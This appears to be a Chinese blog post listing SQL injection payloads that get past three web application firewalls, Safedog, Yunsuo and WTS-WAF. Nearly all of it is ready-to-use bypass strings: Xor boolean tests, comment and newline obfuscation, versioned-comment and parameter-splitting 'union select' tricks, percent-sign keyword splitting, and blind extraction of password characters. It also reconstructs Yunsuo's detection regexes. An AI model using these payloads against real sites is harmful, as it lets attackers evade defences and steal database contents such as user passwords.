SQL Bypass 之安全狗,云锁,WTS-WAF

安全狗:v4.0.26550

and 1=1,已经2020年了,大多waf都拦截,哈哈

Xor 1=1,Xor 1=2    不拦截

测试发现/*/* 可以过  /*/*and/*/*1=2

if 也不拦截

%23a%0a也可以    %23表示#    %0a表示换行

获取字段数:

但是还会拦截一些关键函数,如user(),databse()

所以需要用if等函数进行注入

还可以利用版本注释进行绕过

union /*!01344select*/ 1,2,3%23

发现安全狗不拦截/**/之间的内容

index.php?id=1

bypass:index.php?a=/*&id=1 and 1=2 union select version(),2,3%23*/



云锁:v3.1.18.13

利用安全狗的姿势发现被拦截

还好云锁也一样,对Xor都网开一面

id=2 Xor length(database())=4    云锁不会拦截关键函数

得到数据库:security

这样也是仅仅只能获取到数据库名称,一般提交漏洞是可以的

获取字段:


bypass:xor substr(password,1,1)='t'    只能进行盲猜字段内容

--+/*%0aand 1=2%0a--+*/    也是可以进行判断,最终没有全部bypass


云锁的一些规则:

 /**/替换为空

/*!*/替换为空

匹配的关键有:and,or,updatexml,select xxx from,union xxx select

匹配select xx from的正则应该是:select .*? from

匹配union xx select的正则应该是:union .*? select


WTS-WAF:未知

bypass:id=1 an%d 1=2    只需要在关键词中加%即可绕过



分享到:更多

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)